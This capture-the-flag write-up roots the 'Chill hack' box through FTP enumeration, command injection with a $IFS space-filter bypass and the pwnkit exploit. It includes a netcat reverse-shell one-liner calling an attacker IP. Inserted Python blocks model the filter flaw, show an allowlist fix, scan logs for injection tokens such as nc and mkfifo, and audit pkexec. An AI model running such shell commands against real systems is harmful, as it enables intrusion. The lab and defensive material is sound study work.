Chill hack
Difficulty = easy
Os = linux
Hi guys,
let's root another fun box today.
let's get started.
Nmap scan
As you can see we have 3 open ports, of which port 21 (FTP) allows anonymous login.
so let's enumerate the port further by connecting to the FTP server using 'anonymous' as the username and hitting enter to get logged in. Then download the file on the server to your local machine.
so, let's check the content of the downloaded file
the file contains a hint to the box.
let's proceed further by fuzzing for directories using ffuf
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://10.10.85.120/FUZZ
got the directory /secret
visiting the directory we can tell that the box is about command injection
so, you can confirm it by executing the id command
proceeding further we notice that our commands ain't working due to some kind of filter
I found out that spaces get filtered, thereby triggering the alert.
so, let's bypass the filter using the 'internal field separator' $IFS
cat$IFS/etc/passwd should work
dope! it has been bypassed. which means we have to replace the spaces with $IFS
let's pop our sweet reverse shell by starting a netcat listener and executing this command:
rm$IFS/tmp/f;mkfifo$IFS/tmp/f;cat$IFS/tmp/f|/bin/sh -i 2>&1|nc 10.9.3.145 1337 >/tmp/f
cool we have a shell xD
so, stabilize the shell.
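As an added illustration (not code from the box or from this write-up), here is a small Python model of why the space filter above fails and what the defender-side answer looks like: a denylist that blocks only the space character, an allowlist dispatcher that never builds a shell command string, and a scan over constructed access-log lines for the $IFS and mkfifo primitives used above. The log format, the /secret/?command= parameter name and the use of GET are assumptions; the page does not state how the form submits its input.

```python
import re
import subprocess
from urllib.parse import parse_qs, urlsplit

# --- 1. The filter the page ran into: a denylist on the space character -------
# "id" passes; "cat /etc/passwd" is rejected; "cat$IFS/etc/passwd" passes,
# because the shell, not the filter, is what turns $IFS into whitespace.
DENIED_CHARS = {" "}  # constructed model of the page's filter, not the box's real code


def denylist_accepts(user_input: str) -> bool:
    """True if a space-only denylist would let the input reach the shell."""
    return not any(ch in user_input for ch in DENIED_CHARS)


# --- 2. Hardened form: allowlist fixed argv vectors, never build a shell string
ALLOWED_COMMANDS = {
    "id": ["id"],
    "whoami": ["whoami"],
    "uptime": ["uptime"],
}


def safe_argv(user_input: str):
    """Map the request to a fixed argv list, or None if it is not allowlisted."""
    return ALLOWED_COMMANDS.get(user_input.strip())


def run_safely(user_input: str) -> str:
    """Execute only an allowlisted command; anything else is rejected unrun."""
    argv = safe_argv(user_input)
    if argv is None:
        return "rejected"
    # shell=False: argv goes straight to execve, so $IFS, ';' and '|' are inert text
    return subprocess.run(argv, capture_output=True, text=True, check=False).stdout


# --- 3. Detection: scan access-log query strings for the bypass primitives ----
INJECTION_PATTERN = re.compile(
    r"\$\{?IFS\}?|[;|&`]|\$\(|mkfifo|/dev/tcp/|\bnc\b", re.IGNORECASE)
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Constructed sample log; the IPs are the ones used in the write-up.
SAMPLE_LOG = [
    '10.9.3.145 - - [01/Jan/2022:10:00:01 +0000] "GET /secret/?command=id HTTP/1.1" 200 512',
    '10.9.3.145 - - [01/Jan/2022:10:00:07 +0000] "GET /secret/?command=cat%24IFS/etc/passwd HTTP/1.1" 200 2048',
    '10.9.3.145 - - [01/Jan/2022:10:00:15 +0000] "GET /secret/?command=rm%24IFS/tmp/f%3Bmkfifo%24IFS/tmp/f HTTP/1.1" 200 0',
    '10.10.85.120 - - [01/Jan/2022:10:01:00 +0000] "GET /index.html HTTP/1.1" 200 1024',
]


def flag_requests(log_lines):
    """Return [(line_no, parameter, decoded_value, matched_token)] for suspicious queries."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        # parse_qs percent-decodes, so %24IFS is inspected as $IFS
        for param, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                found = INJECTION_PATTERN.search(value)
                if found:
                    hits.append((n, param, value, found.group(0)))
    return hits


if __name__ == "__main__":
    for probe in ("id", "cat /etc/passwd", "cat$IFS/etc/passwd"):
        print(f"{probe!r}: denylist accepts={denylist_accepts(probe)}, allowlist argv={safe_argv(probe)}")
    for hit in flag_requests(SAMPLE_LOG):
        print("suspicious request:", hit)
```

The point of the allowlist is that the application decides the full argv itself; user text only selects among fixed entries, so there is nothing for a separator trick to reach. The log scan is a triage aid, not a control: it catches the specific primitives seen here, and a denylist of tokens has the same blind spots as the filter it is hunting for.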
Privilege escalation
Enumeration shows that the machine is vulnerable to pwnkit; use uname -a to confirm.
so, let's move the pwnkit exploit to the box and run it to gain root
we are able to cat the user and root flags
that's the unintended way to gain root
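PwnKit lives in polkit's setuid pkexec binary, so the defensive check is on that file rather than on the kernel string, and the published interim mitigation is to clear the setuid bit (chmod 0755 on pkexec) until polkit is updated. The following Python helper, added here and not part of the write-up, reports whether a candidate pkexec path is present and setuid-root; the candidate paths are assumptions, and the self-check uses a constructed temporary file rather than the real binary.

```python
import os
import stat
import tempfile

# Assumed install locations; distributions differ, so extend as needed.
PKEXEC_CANDIDATES = ["/usr/bin/pkexec", "/usr/local/bin/pkexec"]


def setuid_bit_set(path: str) -> bool:
    """True if path exists and carries the setuid (u+s) permission bit."""
    try:
        return bool(os.stat(path).st_mode & stat.S_ISUID)
    except FileNotFoundError:
        return False


def pkexec_status(path: str) -> str:
    """Classify one candidate path for PwnKit exposure.

    'absent'       - no file there
    'mitigated'    - present but not setuid, so pkexec cannot elevate at all
    'setuid-root'  - present, setuid and root-owned: patch polkit or clear the bit
    'setuid-other' - setuid but not root-owned: unusual, worth a look, but not PwnKit
    """
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return "absent"
    if not st.st_mode & stat.S_ISUID:
        return "mitigated"
    return "setuid-root" if st.st_uid == 0 else "setuid-other"


def audit(paths=PKEXEC_CANDIDATES) -> dict:
    """Return {path: status} for every candidate, one inventory line per host."""
    return {p: pkexec_status(p) for p in paths}


def self_check() -> bool:
    """Exercise the bit test on a constructed temp file: u+s on, then off."""
    fd, tmp = tempfile.mkstemp()
    os.close(fd)
    try:
        os.chmod(tmp, 0o4755)
        with_bit = setuid_bit_set(tmp)
        os.chmod(tmp, 0o755)
        without_bit = setuid_bit_set(tmp)
    finally:
        os.unlink(tmp)
    return with_bit and not without_bit


if __name__ == "__main__":
    for path, status in audit().items():
        print(f"{path}: {status}")
```

A 'mitigated' result only means this particular escalation path is closed; the real fix is the vendor polkit update, after which the bit is restored and pkexec works again for its legitimate purpose.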
so let's go the intended way:
bankai senbonzakura kageyoshi lol